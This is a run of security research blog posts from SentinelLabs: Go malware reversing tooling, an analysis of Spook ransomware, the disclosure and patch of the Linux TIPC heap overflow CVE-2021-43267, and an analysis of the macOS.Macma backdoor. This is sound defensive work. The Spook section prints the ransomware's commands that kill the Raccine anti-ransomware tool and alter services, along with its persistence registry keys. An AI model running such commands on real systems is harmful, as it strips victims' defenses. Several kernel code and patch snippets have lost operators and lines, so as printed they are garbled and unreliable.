The issue of arguments should prove disturbing for our dynamic analyst friends who were hoping that a debugger would spare them the trouble of manual analysis. While a debugger certainly helps determine arguments at runtime, it’s important to understand how indirect that runtime is. Go is peculiar in allocating a runtime stack owned by the caller function that will in turn handle arguments and allow for multiple return values. For us it translates into a mess of runtime function prologues before any meaningful functionality. Good luck navigating that without symbols.

Improving the Go Reversing Experience

With all those inadvertent obstacles in mind, it’s perfectly understandable that reversers dreaded analyzing Go binaries. However, the situation has changed in the past few years and we should reassess our collective abhorrence of Go malware. Different disassemblers and decompilers have stepped up their Go support. BinaryNinja and Cerbero have improved their native support for Go and there are now standalone frameworks like GoRE that offer good functionality depending on the Go compiler version and can even help support other projects like radare2.

We’ll be focusing on IDA Pro. With the advent of version 7.6, IDA’s native support of Go binaries is drastically better and we’ll be building features on top of this. For folks stuck on v7.5 or lower, we’ll also provide some help by way of scripts but the full functionality of AlphaGolang is unlocked with 7.6 due to some missing APIs (specifically the ida_dirtree API for the new folder tree view). This isn’t the first time brave souls in the community have attempted to improve the Go reversing experience for IDA. However, those projects were largely monolithic labors of love by their original authors and given the fickle nature of IDA’s APIs, once those authors got busy, the scripts fell into disrepair. We hope to improve that as well.


With AlphaGolang, we wanted to tackle two disparate problems simultaneously– the brittleness of IDApython scripts for Go reversing and the need for clear steps to analyze these binaries.

We can’t expect everyone to be an expert in Go in order to understand their way around a binary. Less so to have to fix the tooling they’re attempting to rely on. While engineers might be tempted to address the former by elaborating a complex framework, we figured we’d swing in the opposite direction and break up the requisite functionality into smaller scripts. Those smaller digestible scripts allow us to part out a relatable methodology in steps so that analysts can pick and choose what they need as they advance in their reversing journey.

Additionally, we hope the simplicity of the project and a forthrightness about its current limitations will inspire others to contribute new steps, fixes, and additional functionality.

At this time, the first five steps are as follows–

Step 0: Identifying Go Binaries

Go Build ID Regex

By popular request, we are including a simple YARA rule to help identify Go binaries. This is a quick and scrappy solution that checks for PE, ELF, and Mach-O file headers along with a regex for a single Go Build ID string.

Step 1: Recreate pcln Table

Recreating the Go pcln table

Dealing with stripped Golang binaries is particularly awful. Reversers unfamiliar with Go are disheartened to see that despite having all of the original function names within the binary, their disassembler is unable to connect those symbols as labels for their functions. While that might seem like a grand coup for malware developers attempting to confuse and frustrate analysts, it isn’t more than a temporary inconvenience. Despite being stripped, we have enough information available to reconstruct the Go pcln table and provide the disassembler with the information it needs.

Two noteworthy points before continuing:

  • The pcln table is documented as early as Go v1.12 and has been modified as of v1.16.
  • IDA Pro v7.6+ handles Go binaries very well and is unlikely to need this step. This script will prove particularly valuable for folks using IDA v7.5 and under when dealing with stripped Go binaries.

Depending on the file’s endianness, the script will locate the pcln table’s magic header, walk the table converting the data to DWORDs (or QWORDs depending on the bitness), and create a new segment with the appropriate ‘.gopclntab’ header effectively undoing the stripping process.

Step 2: Discover Missing Functions and Restore Function Names

Function discovery and renaming

Immediately after recreating the pcln table (or in unfortunate cases where automatic disassembly fails), function names are not automatically assigned and many functions may have eluded discovery. We are going to fix both of these issues in one simple go.

We know that the pcln table is pointing us at every function in the binary, even if IDA hasn’t recognized them. This script will walk the pcln table, check the offsets therein for an existing function, and instruct IDA to define a function wherever one is missing. The resulting number of functions can be drastically greater even in cases where disassembly seems perfect.

Additionally, we’ll borrow Tim Strazzere’s magic from the original Golang Loader Assist in order to label all of our functions. We ported the plugin to Python 3, made it compatible with the new IDA APIs, and refactored it. The functionality is now part of two separate steps (2 and 4) and easier to maintain. In this step, Strazzere’s magic will help us associate all of our functions with their original names in an IDA friendly format.

Step 3: Surface User-Generated Functions

Automatically categorizing functions

Having recovered and labeled all of our functions, we are now faced with the daunting proposition of sifting through thousands of functions. Most of these functions are part of Go’s standard packages or perhaps functionality imported from GitHub repositories. To belabor a metaphor, we now have street signs but no map. How do we fix this?

IDA v7.5 introduced the concept of Folder Views, an easily missed Godsend for the anal-retentive reverser. This feature has to be explicitly turned on via a right-click on the desired subview –whether functions, structures, imports, etc. IDA v7.6 takes this a step further by introducing a thus-far undocumented API to interact with these folder views (A heartfelt thank you to Milan Bohacek for his help in effectively wielding this API). That should enable us to automate some extraordinary time-saving functionality.

While our malware may have 5,000 functions, the majority of those functions were not written by the malware developers, they’re publicly documented, and we need nothing more than a nominal overview to know what they do.

NOBELIUM GoldMax (a.k.a. SunShuttle)

By being clever about categorizing function packages, we can actually whittle down to a fraction of the overall functions that merit analyst time. Functions will be categorized by their package prefixes and further grouped as ‘Standard Go Packages’, unlabeled (‘sub_’), uncategorized (no package prefix), and Github imports. What remains are the ‘main’ package and any custom packages added by the malware developers. For a notable example, the NOBELIUM GoldMax (a.k.a. SunShuttle) malware can be reduced from a hulking 4,771 functions to a mere 22. This is the simplest and perhaps the most valuable step towards our goal of understanding the malware’s functionality.

Step 4: Fix String References

Accurately recasting strings by reference

Finally, there’s the issue of strings in Go. Unlike all C-derivative languages, strings in Go are not null terminated. Neither are they grouped together based on their source or functionality. Rather, the linker places all of the strings in order of incremental length, with no obvious demarcation as to where one string ends and the next begins. This works because whenever a function references a string, it does so by loading the string address and a hardcoded length. While this is a safer paradigm for handling strings, it makes for an unpleasant reversing experience.

So how do we overcome this hurdle? Here’s where another piece of Strazzere’s Golang Loader Assist can help us. His original plugin would check functions for certain string loading patterns and use these as a guide to fix the string assignments. We have once again (partially) refactored this functionality, made it compatible with Python 3, and IDA’s new APIs. We have also improved some of the logic for the string blobs in place (either by suspicious length or because a reference points to the middle of a blob) and added some sanity checks.

While this step is already a marked improvement, we are seeing new string loading patterns introduced with Go v1.17 that need adding and there’s definitely room for improved refactoring. We hope some of you will feel inclined to contribute.

Where Do We Go From Here?

Let’s take a step back and look at where we are after all of these steps. We have an IDB with all functions discovered, labeled, and categorized, and hopefully all of their string references are correctly annotated. This is an ideal we could seldom dream of with malware of a comparable size written in C or C++ without extensive analysis time and prior expertise.

Now that we have a clear view of the user-generated functionality, what more can we do? How else can we improve our hunting and analysis efforts?

The following are a series of ideas we’d recommend implementing in further steps–

  • How about auto-generating YARA rules for user-generated functions and their referred strings?
  • Want a better understanding of arguments as they’re passed between functions? How about automagically setting breakpoints at the runtime stack prologues and annotating the arguments back to our IDB?
  • For reversers that follow the Kwiatkowski school of rewriting the code to understand the program’s functionality, how about selectively exporting the Hex-Rays pseudocode solely for the user-generated functions?
  • How about reconstructing interfaces and type structs from runtime objects?

Got more ideas? Want to help? Head to our SentinelLabs GitHub repo for all of the scripts and contribute your own shortcuts and superpowers for analyzing Go malware!

We’d like to thank the following for their direct and indirect contributions– 

  • Tim Strazzere for his original Golang Loader Assist script, which we refactored and made compatible with Python3 and the new IDA APIs. 
  • Milan Bohacek (Avast Software s.r.o.) for his invaluable help figuring out the idatree API.
  • Joakim Kennedy (Intezer)
  • Ivan Kwiatkowski (Kaspersky GReAT) for making his Go reversing course available.
  • Igor Kuznetsov (Kaspersky GReAT) for his help understanding newer pcln tab versions.


Guides and Documentation



Spook Ransomware | Prometheus Derivative Names Those That Pay, Shames Those That Don’t

28 October 2021 at 16:12

By Jim Walter and Niranjan Jayanand

Executive Summary

  • Spook Ransomware is an emerging player first seen in late September 2021
  • The operators publish details of all victims regardless of whether they pay or not
  • Targets range across several industries with an emphasis on manufacturing
  • Analysis shows a significant degree of code sharing between Spook and the Prometheus and Thanos ransomware families


Spook ransomware emerged onto the scene in late September 2021 and follows the multi-pronged extortion model that is all too common these days. Victims are hit with the threat of data destruction as well as public data leakage and the associated fallout. In this report, we explore how the malware shares certain similarities with earlier ransomware families, and describe its main encryption and execution behaviour.

Spook and Prometheus

There is some indication that Spook is either linked to, or derived from, Prometheus ransomware. Prometheus is itself an evolution of Thanos ransomware. However, it is important to note that since Thanos ransomware had a builder which was leaked, any real attempts at attribution based solely on the malware’s code is somewhat futile. Even so, there are a few notable similarities between Spook, Prometheus, and ultimately Thanos.

The .NET binary in the following sample, first seen in VirusTotal on 02 October, provides a glimpse into some of these similarities, with artifacts from the Thanos builder also apparent.

Shared code block with Thanos

Our analysis suggests that there is an overlap of between 29-50% of shared code between Spook and Prometheus. Some of this overlap is related to construction of the ransom notes and key identifiers.

Ransom note similarity example (Prometheus vs Spook)

In addition to shared code artifacts, there are similarities with regards to the layout and structure of the Spook and Prometheus payment portals.

Below are the similarities between the leak data URLs hosted by both the groups

  • Spook ransomware:
  • Prometheus ransomware:

Offline Encryption and Process Manipulation

Spook, mirroring the manifestos of others, boasts “very strong (AES) encryption” along with the threat of leaking victim data to the public. The malware has the ability to encrypt target machines without requiring internet connectivity. Encryption of a full disk can occur within just a few minutes, at which point the ransom note is displayed on the desktop (RESTORE_FILES_INFO.HTA) along with numerous other system notifications.

The malware also makes a number of changes to ensure that the ransom notifications are displayed prominently after reboot (via Start Menu lnk, Reg).

WinLogon is modified (via registry) to display the Ransom Note text upon login:

	HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon
	Str Value: LegalNoticeCaption/Text

Registry Modifications for Persistence

Ransom notes are also displayed upon login via a Shortcut placed in the Startup directory

Startup Folder Shortcut

In addition, Spook will attempt to terminate processes and stop services of anything that may inhibit the encryption process.

Here again there is overlap between Spook, Prometheus, and Thanos with regards to process discovery and manipulation, especially with regards to checking for and killing the Raccine anti-ransomware process that some organizations deploy in an effort to protect shadow copies.

TASKILL.EXE is used to force the termination of the following processes if found:

	taskkill.exe /IM ocomm.exe /F

The Raccine product is specifically targeted with regards to disabling the products’ UI components and update features. These are carried out via basic OS commands such as reg.exe and schtasks.exe.

	taskkill.exe /F /IM RaccineSettings.exe
	reg.exe (CLI interpreter) delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
	reg.exe (CLI interpreter) delete HKCU\Software\Raccine /F
	schtasks.exe (CLI interpreter) /DELETE /TN "Raccine Rules Updater" /F

In addition, sc.exe is used to disable specific services and components:

	sc.exe config Dnscache start= auto
	sc.exe config SQLTELEMETRY start= disabled
	sc.exe config FDResPub start= auto
	sc.exe config SSDPSRV start= auto
	sc.exe config SQLTELEMETRY$ECWDB2 start= disabled
	sc.exe config SstpSvc start= disabled
	sc.exe config upnphost start= auto
	sc.exe config SQLWriter start= disabled

With various processes out of the way and the system in an optimal state for encryption, the malware proceeds to enumerate local files and folders, along with accessible network resources.

Given the Thanos pedigree, specifics around encryption can vary. The samples analyzed employ a random string at runtime as the passphrase for file encryption (AES). The string is subsequently encrypted with the attacker’s public key and added into the generated ransom note(s). Recovery of encrypted data is, therefore, not possible without the corresponding private key.

Ransom Payment and Victimology

Upon infection, victims are instructed to proceed to Spook’s TOR-based payment portal.

Spook Ransom Demand

At the payment portal, the victim is able to interact with the attackers via chat to negotiate payment.

Spook Payment Portal

Spook has been leveraging attacks against high-value targets across the globe, with little to no discretion with regards to industry. Looking at the current cross-section of victims posted on the group’s web site, however, the majority are in the manufacturing sector.

The public blog went live in early October 2021. At the time of writing, there are 17 victims posted on the Spook site.

Some of the victims named on the Spook blog site

Spook actually lists all attacked companies, regardless of whether or not they pay the ransom demand. Those victims that pay have their entry updated to indicate that the company’s data is ‘not for sale’. Those that have not paid are listed as having data that is “For Sale”, while some victim entries, presumably the most recent or those that are in the process of negotiating, are listed as “Company Decides”.


As these attacks continue to escalate and become more egregious, the need for true attack prevention is all the more critical. Spook’s tactic of public outing victims even if they pay threatens reputational harm to any compromised company, even if they follow the attackers’ payment demands.

This only continues to illustrate the importance of preventing attacks in the first place. Ransomware operators have moved beyond worrying about companies detecting after-the-fact and attempting to recover encrypted data.

Indicators of Compromise



TA0005 – Defense Evasion
T1486 – Data Encrypted for Impact
T1027.002 – Obfuscated Files or Information: Software Packing
T1007 – System Service Discovery
T1059 – Command and Scripting Interpreter
T1112 – Modify Registry
TA0010 – Exfiltration
T1018 – Remote System Discovery
T1082 – System Information Discovery
T1547.004 – Boot or Logon Autostart Execution: Winlogon Helper DLL
T1547.001 – Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder

Spook Ransom Note Sample

CVE-2021-43267: Remote Linux Kernel Heap Overflow | TIPC Module Allows Arbitrary Code Execution

4 November 2021 at 10:57

Executive Summary

  • SentinelLabs has discovered a heap overflow vulnerability in the TIPC module of the Linux Kernel.
  • The vulnerability can be exploited either locally or remotely within a network to gain kernel privileges, allowing an attacker to compromise the entire system.
  • The TIPC module comes with all major Linux distributions but needs to be loaded in order to enable the protocol.
  • A patch has been released on the 29th of October and affects kernel versions between 5.10 and 5.15.
  • At this time, SentinelOne has not identified evidence of in-the-wild abuse.

Introduction and Methodology

As a researcher, it’s important to add new techniques and software to your bug hunting methodology. A year ago, I started using CodeQL for my own research on open source projects and decided to compile the Linux kernel with it and try my luck.

For those who haven’t come across it before, CodeQL is an analysis engine that allows you to run queries on code. From a security perspective, this can allow you to find vulnerabilities purely by describing what they look like. CodeQL will then go off and find all instances of that vulnerability.

I’d had a passing thought about overflows that I wanted to take a quick look at between research projects, namely, looking at locations in which a 16-bit variable was passed to kmalloc. My thinking was that 16-bits would be easier to realistically overflow than a 32-bit or 64-bit number.

The query itself is basic and isn’t aimed at finding actual overflows, just looking for interesting kmalloc calls as a starting point for a larger query:

import cpp

from FunctionCall fc // Select all Function Calls
where fc.getTarget().getName() = "kmalloc" // Where the target function is called kmalloc
and fc.getArgument(0).getType().getSize() = 2 // and the supplied size argument is a 16-bit int
select fc, fc.getLocation() // Select the call location and the string of the location to know what file it’s in

This returned 60 results. After briefly looking over a few, one result stood out above the rest:

static bool tipc_crypto_key_rcv(struct tipc_crypto *rx, struct tipc_msg *hdr) // (1)
	struct tipc_crypto *tx = tipc_net(rx->net)->crypto_tx;
	struct tipc_aead_key *skey = NULL;
	u16 key_gen = msg_key_gen(hdr);
	u16 size = msg_data_sz(hdr);                                               // (2)
	u8 *data = msg_data(hdr);

/* ... */
	/* Allocate memory for the key */
	skey = kmalloc(size, GFP_ATOMIC);                                          // (3)
	if (unlikely(!skey)) {
		pr_err("%s: unable to allocate memory for skey\n", rx->name);
		goto exit;

	/* Copy key from msg data */
	skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));           // (4)
	memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
	memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),
			skey->keylen);                                                    // (5)

	/* Sanity check */
	if (unlikely(size != tipc_aead_key_size(skey))) {                         // (6)
		skey = NULL;
		goto exit;
/* ... */

What struck me as interesting is that this seems to be a function for parsing received data (1) and doesn’t appear to have any validation on the size (4) (5) obtained from the body of the message (2) until after it’s already copied (6). It also appears that the copied size could be different to the allocated size (3). This looked like a clear-cut kernel heap buffer overflow.

What is the Linux TIPC Protocol?

Transparent Inter-Process Communication (TIPC) is a protocol that allows nodes in a cluster to communicate with each other in a way that can optimally handle a large number of nodes remaining fault tolerant.

In order to keep this section brief, this post will focus on the key components. For a more detailed and high-level description of the actual TIPC protocol, including the various ways messaging is performed and how Service Tracking works, it’s best to refer to the official sourceforge page.

The protocol is implemented in a kernel module packaged with all major Linux distributions. When loaded by a user, it can be used as a socket and can be configured on an interface using netlink (or using the userspace tool tipc, which will perform these netlink calls) as an unprivileged user.

TIPC can be configured to operate on top of a bearer protocol such as Ethernet or UDP (in the latter case, the kernel listens on port 6118 for incoming messages from any machine). Since a low privileged user is unable to create raw ethernet frames, setting the bearer to UDP makes it easier to write a local exploit for.

Although TIPC is used on top of these protocols, it has a separate addressing scheme whereby nodes can choose their own addresses.

The TIPC protocol works in a way transparent to the user. All message construction and parsing is performed in the kernel. Each TIPC message has a common header format and some message-specific headers (hence the variable total size of the header).

The most important parts of the common header for this vulnerability are the ‘Header Size’ –the actual header size shifted to the right by two bits– and the ‘Message Size’ –the entire TIPC message taking into account the header size:

An example of a TIPC message header

These two sizes are validated by the tipc_msg_validate function.

bool tipc_msg_validate(struct sk_buff **_skb)
  struct sk_buff *skb = *_skb;
  struct tipc_msg *hdr;
  int msz, hsz;

/* ... */

  hsz = msg_hdr_sz(buf_msg(skb));
  if (unlikely(hsz  MAX_H_SIZE))
      return false;

/* ... */

  hdr = buf_msg(skb);

/* ... */

  msz = msg_size(hdr);
  if (unlikely(msz  TIPC_MAX_USER_MSG_SIZE))
      return false;
  if (unlikely(skb->len validated = 1;

  return true;

The Message Size is correctly validated as greater than the Header Size, the payload size is validated against the maximum user message size, and the message size is validated against the actual received packet length.

Overview of the TIPC Vulnerability

In September 2020, a new user message type was introduced called MSG_CRYPTO, which allows peers to send cryptographic keys (at the moment, only AES GCM appears to be supported). This is part of the 2021 TIPC roadmap.

The body of the message has the following structure:

 struct tipc_aead_key {
	char alg_name[TIPC_AEAD_ALG_NAME];
	unsigned int keylen; 	/* in bytes */
	char key[];

Where TIPC_AEAD_ALG_NAME is a macro for 32. When this message is received, the TIPC kernel module needs to copy this information into storage for that node:

  /* Allocate memory for the key */
  skey = kmalloc(size, GFP_ATOMIC);
/* ... */

  /* Copy key from msg data */
  skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
  memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
  memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),

The size used to allocate is the same as the size of the message payload (calculated from the Header Size being subtracted from the Message Size). The name of the key algorithm is copied and the key itself is then copied as well.

As mentioned above, the Header Size and the Message Size are both validated against the actual packet size. So while these values are guaranteed to be within the range of the actual packet, there are no similar checks for either the keylen member of the MSG_CRYPTO message or the size of the key algorithm name itself (TIPC_AEAD_ALG_NAME) against the message size. This means that an attacker can create a packet with a small body size to allocate heap memory, and then use an arbitrary size in the keylen attribute to write outside the bounds of this location:

An example of a MSG_CRYPTO message that triggers the vulnerability

Exploitability of CVE-2021-43267

This vulnerability can be exploited both locally and remotely. While local exploitation is easier due to greater control over the objects allocated in the kernel heap, remote exploitation can be achieved thanks to the structures that TIPC supports.

As for the data being overwritten, at first glance it may look like the overflow will have uncontrolled data, since the actual message size used to allocate the heap location is verified. However, a second look at the message validation function shows that it only checks that the message size in the header is within the bounds of the actual packet. That means that an attacker could create a 20 byte packet and set the message size to 10 bytes without failing the check:

if (unlikely(skb->len 

The Patch for CVE-2021-43267

In order to aid in fixing the issue quickly, I drafted a patch idea along with the report. After some very helpful discussion with one person from the Linux Foundation and one of the TIPC maintainers, the following patch was decided on:

 net/tipc/crypto.c | 32 +++++++++++++++++++++-----------
 1 file changed, 21 insertions(+), 11 deletions(-)

 diff --git a/net/tipc/crypto.c b/net/tipc/crypto.c
 index c9391d38d..dc60c32bb 100644
 --- a/net/tipc/crypto.c
 +++ b/net/tipc/crypto.c
 @@ -2285,43 +2285,53 @@ static bool tipc_crypto_key_rcv(struct tipc_crypto *rx, struct tipc_msg *hdr)
   u16 key_gen = msg_key_gen(hdr);
   u16 size = msg_data_sz(hdr);
   u8 *data = msg_data(hdr);

 +   unsigned int keylen;
 +   /* Verify whether the size can exist in the packet */
 +   if (unlikely(size name);
 +       goto exit;
 +   }
 +   keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
 +   /* Verify the supplied size values */
 +   if (unlikely(size != keylen + sizeof(struct tipc_aead_key) ||
 +            keylen > TIPC_AEAD_KEY_SIZE_MAX)) {
 +       pr_debug("%s: invalid MSG_CRYPTO key size\n", rx->name);
 +       goto exit;
 +   }

     if (unlikely(rx->skey || (key_gen == rx->key_gen && rx->key.keys))) {
	 pr_err("%s: key existed , gen %d vs %d\n", rx->name,
		rx->skey, key_gen, rx->key_gen);
 -        goto exit;
 +        goto exit_unlock;
     /* Allocate memory for the key */
     skey = kmalloc(size, GFP_ATOMIC);
     if (unlikely(!skey)) {
	 pr_err("%s: unable to allocate memory for skey\n", rx->name);
 -        goto exit;
 +        goto exit_unlock;

     /* Copy key from msg data */
 -   skey->keylen = ntohl(*((__be32 *)(data + TIPC_AEAD_ALG_NAME)));
 +   skey->keylen = keylen;
    memcpy(skey->alg_name, data, TIPC_AEAD_ALG_NAME);
    memcpy(skey->key, data + TIPC_AEAD_ALG_NAME + sizeof(__be32),

 -   /* Sanity check */
 -   if (unlikely(size != tipc_aead_key_size(skey))) {
 -       kfree(skey);
 -       skey = NULL;
 -       goto exit;
 -   }
    rx->key_gen = key_gen;
    rx->skey_mode = msg_key_mode(hdr);
    rx->skey = skey;
    rx->nokey = 0;
    mb(); /* for nokey flag */

 - exit:
 + exit_unlock:
 + exit:
    /* Schedule the key attaching on this crypto */
    if (likely(skey && queue_delayed_work(tx->wq, &rx->work, 0)))
	return true;

This patch moves the size validation to take place before the copy has taken place instead of after it. I’ve also added a size overflow check along with additional checks for the minimum packet size and the supplied key size.


As this vulnerability was discovered within a year of its introduction into the codebase, TIPC users should ensure that their Linux kernel version is not between 5.10-rc1 and 5.15.


The vulnerability research that SentinelLabs conducts allows us to protect users on a global scale by identifying and fixing vulnerabilities before malicious actors do. In the case of TIPC, the vulnerability was caught within a year of its introduction into the codebase. While TIPC itself isn’t loaded automatically by the system but by end users, the ability to configure it from an unprivileged local perspective and the possibility of remote exploitation makes this a dangerous vulnerability for those that use it in their networks. What is more concerning is that an attacker that exploits this vulnerability could execute arbitrary code within the kernel, leading to a complete compromise of the system.

Disclosure Timeline

19 Oct 2021 - SentinelLabs supplied the initial vulnerability report to the team
19 Oct 2021 - Greg K.H. responds and adds the TIPC maintainers to the email thread
21 Oct 2021 - The patch is finalised
25 Oct 2021 - The patch is added to
29 Oct 2021 - The patch is added to the mainline repository
31 Oct 2021 - The patch is now officially under 5.15
04 Nov 2021 - SentinelLabs publicly disclose details of the vulnerability

Infect If Needed | A Deeper Dive Into Targeted Backdoor macOS.Macma

15 November 2021 at 18:41

Last week, Google’s Threat Analysis Group published details around what appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Google’s report focused on the use of two vulnerabilities: a zero day and a N-day (a known vulnerability with an available patch).

By the time of Google’s publication both had, in fact, been patched for some months. What received less attention was the malware that the vulnerabilities were leveraged to drop: a backdoor that works just fine even on the latest patched systems of macOS Monterey.

Google labelled the backdoor “Macma”, and we will follow suit. Shortly after Google’s publication, a rapid triage of the backdoor was published by Objective-See (under the name “OSX.CDDS”). In this post, we take a deeper dive into macOS.Macma, reveal further IoCs to aid defenders and threat hunters, and speculate on some of macOS.Macma’s (hitherto-unmentioned) interesting artifacts.

How macOS.Macma Gains Persistence

Thanks to the work of Google’s TAG team, we were able to grab two versions of the backdoor used by the threat actors, which we will label UserAgent 2019 and UserAgent 2021. Both are interesting, but arguably the earlier 2019 version has greater longevity since the delivery mechanism appears to work just fine on macOS Monterey.

The 2019 version of macOS.Macma will run just fine on macOS Monterey

UserAgent 2019 is a Mach-O binary dropped by an application called “”, itself contained in a .DMG file (the disk image sample found by Google has the name “install_flash_player_osx.dmg”). UserAgent 2021 is a standalone Mach-O binary and contains much the same functionality as the 2019 version along with some added AV capture capabilities. This version of macOS.Macma is installed by a separate Mach-O binary dropped when the threat actors leverage the vulnerabilities described in Google’s post.

Both versions install the same persistence agent, in the current user’s ~/Library/LaunchAgents folder.

Macma’s persistence agent,

The property list is worth pausing over as it contains some interesting features. First, aside from the path to the executable, we can see that the persistence agent passes two arguments to the malware before it is run: -runMode, and ifneeded.

The agent also switches the current working directory to a custom folder, in which later will be deposited data from the separate keylogger module, among other things.

We find it interesting that the developer chose to include the LimitLoadToSessionType key with the value “Aqua”. The “Aqua” value ensures the LaunchAgent only runs when there is a logged in GUI user (as opposed to running as a background task or running when a user logs in via SSH). This is likely necessary to ensure other functionality, such as requesting that the user gives access to the Microphone and Accessibility features.

Victims are prompted to allow macOS.Macma access to the Microphone

However, since launchd defaults to “Aqua” when no key is specified at all, this inclusion is rather redundant. We might speculate that the inclusion of the key here suggests the developer is familiar with developing other LaunchAgents in other contexts where other keys are indeed necessary.

Application Bundle Confusion Suggests A “Messy” Development Process

Since we are discussing property lists, there’s some interesting artifacts in the’s Info.plist, and that in turn led us to notice a number of other oddities in the bundle executables.

One of the great things about finding malware built into a bundle with an Info.plist is it gives away some interesting details about when, and on what machine, the malware was built.

macOS.Macma was built on El Capitan

In this case, we see the malware was built on an El Capitan machine running build 15C43. That’s curious, because build 15C43 was never a public release build: it was a beta of El Capitan 11.2 available to developers and AppleSeed (Apple beta testers) briefly around October to November 2015. On December 8th, 2015, El Capitan 11.2 was released with build number 15C50, superseding the previous public release of 11.1, build 15B42 from October 21st.

At this juncture, let’s note that the malware was signed with an ad hoc signature, meaning it did not require an Apple Developer account or ID to satisfy code signing requirements.

Therein lies an anomaly: the bundle was signed without needing a developer account, but it seems that the macOS version used to create this version of macOS.Macma was indeed sourced from a developer account. Such an account could possibly belong to the author(s); possibly be stolen, or possibly acquired with a fake ID. However, the latter two scenarios seem inconsistent with the ad hoc signature. If the developer had a fake or stolen Apple ID, why not codesign it with that for added credibility?

While we’re speculating about the developer or developers’ identities, two other artifacts in the bundle are worthy of mention. The main executable in ../MacOS is called “SafariFlashActivity” and was apparently compiled on Sept 16th, 2019. In the ../Resources folder, we see what appears to be an earlier version of the executable, “SafariFlashActivity1”, built some nine days earlier on Sept 7th.

While these two executables share a large amount of code and functionality, there are also a number of differences between them. Perhaps the most intriguing are that they appear – by accident or by design – to have been created by two entirely different users.

User strings from two binaries in the same macOS.Macma bundle

The user account “lifei” (speculatively, Li Fei, a common-enough Chinese name) seems to have replaced the user account “lxk”. Of course, it could be the same person operating different user accounts, or two entirely different individuals building separately from a common project. Indeed, there are sufficiently large differences in the code in such a short space of time to make it plausible to suggest that two developers were working independently on the same project and that one was chosen over the other for the final executable embedded in the ../MacOs folder.

Note that in the “lifei” builds, we see both the use of “Mac_Ma” for the first time, and “preexcel” — used as the team identifier in the final code signature. Neither of these appear in the “lxk” build, where “SafariFlashActivity” appears to be the project name. This bifurcation even extends to an unusual inconsistency between the identifier used in the bundle and that used in the code signature, where one is xxxxx.SafariFlashActivity and the other is xxxxxx.preexcl-project.

Inconsistent identifiers used in the bundle and code signature of macOS.Macma

In any case, the string “lifei” is found in several of the other binaries in the 2019 version of macOS.Macma, whereas “lxk” is not seen again. In the 2021 version, both “lifei” and “lxk” and all other developer artifacts have disappeared entirely from both the installer and UserAgent binaries, suggesting that the development process had been deliberately cleaned up.

User lifei’s “Macma” seems to have won the ‘battle of the devs’

Finally, if we return to the various (admittedly, falsifiable) compilation dates found in the bundle, there is another curiosity: we noted that the malware appears to have been compiled on a 2015 developer build of macOS, yet the Info.plist has a copyright date of 2018, and the executables in this bundle were built well-over 3 years later in September 2019 according to the (entirely manipulatable) timestamps.

What can we conclude from all these tangled weeds? Nothing concrete, admittedly. But there do seem to be two plausible, if competing, narratives: perhaps the threat actor went to extraordinary, and likely unnecessary, lengths to muddle the artifacts in these binaries. Alternatively, the threat actor had a somewhat confused development process with more than one developer and changing requirements. No doubt the truth is far more complex, but given the nature of the artifacts above, we suspect the latter may well be at least part of the story.

For defenders, all this provides a plethora of collectible artifacts that may, perhaps, help us to identify this malware or track this threat actor in future incidents.

macOS.Macma – Links To Android and Linux Malware?

Things start to get even more interesting when we take a look at artifacts in the executable code itself. As we noted in the introduction, an early report on this malware dubbed it “OSX.CDDS”. We can see why. The code is littered with methods prefixed with CDDS.

Some of the CDDS methods found in the 2021 UserAgent executable

That code, according to Google TAG, is an implementation for a DDS – Data Distribution Service –  framework. While our searches turned up blank trying to find a specific implementation of DDS that matched the functions used in macOS.Macma, we did find other malware that uses the same framework.

Android malware drops an ELF bin that contains the same CDDS framework

Links to known Android malware droppers

These ELF bins and both versions of macOS.Macma’s UserAgent also share another commonality, the strings “Octstr2Dec” and “Dec2Octstr”.

Commonalities between macOS.Macma and a malicious ELF Shared object file

These latter strings, which appear to be conversions for strings containing octals and decimals, may simply be a matter of coincidence or of code reuse. The code similarities we found also have links back to installers for the notorious Shedun Android malware.

In their report, Google’s TAG pointed out that macOS.Macma was associated with an iOS exploit chain that they had not been able to entirely recover. Our analysis suggests that the actors behind macOS.Macma at least were reusing code from ELF/Android developers and possibly could have also been targeting Android phones with malware as well. Further analysis is needed to see how far these connections extend.

Macma’s Keylogger and AV Capture Functionality

While the earlier reports referred to above have already covered the basics of macOS.Macma functionality, we want to expand on previous reporting to reveal further IoCs.

As previously mentioned, macOS.Macma will drop a persistence agent at ~/Library/LaunchAgents/ and an executable at ~/Library/Preferences/lib/UserAgent.

As we noted above, the LaunchAgent will ensure that before the job starts, the executable’s current working directory will be changed to the aforementioned “lib” folder. This folder is used as a repository for data culled by the keylogger, “kAgent”, which itself is dropped at ~/Library/Preferences/Tools/, along with the “at” and “arch” Mach-O binaries.

Binaries dropped by macOS.Macma

The kAgent keylogger creates text files of captured keystrokes from any text input field, including Spotlight, Finder, Safari, Mail, Messages and other apps that have text fields for passwords and so on. The text files are created with Unix timestamps for names and collected in directories called “data”.

The file 1636804188 contains data captured by the keylogger

We also note that this malware reaches out to a remote .php file to return the user’s IP address. The same URL has a long history of use.
Both Android and macOS malware ping this URL

Finally, one further IoC we noted in the ../MacOS/SafariFlashActivity “lifei” binary that never appeared anywhere else, and we also did not see dropped on any of our test runs, was:

Malware tries to drop a file in the Safari folder

This is worth mentioning since the target folder, the User’s Library/Safari folder, is TCC protected since Mojave. For that reason, any attempt to install there would fall afoul of current TCC protections (bypasses notwithstanding). It looks, therefore, like a remnant of the earlier code development from El Capitan era, and indeed we do not see this string in later versions. However, it’s unique enough for defenders to watch out for: there’s never any legitimate reason for an executable at this path to exist on any version of macOS.


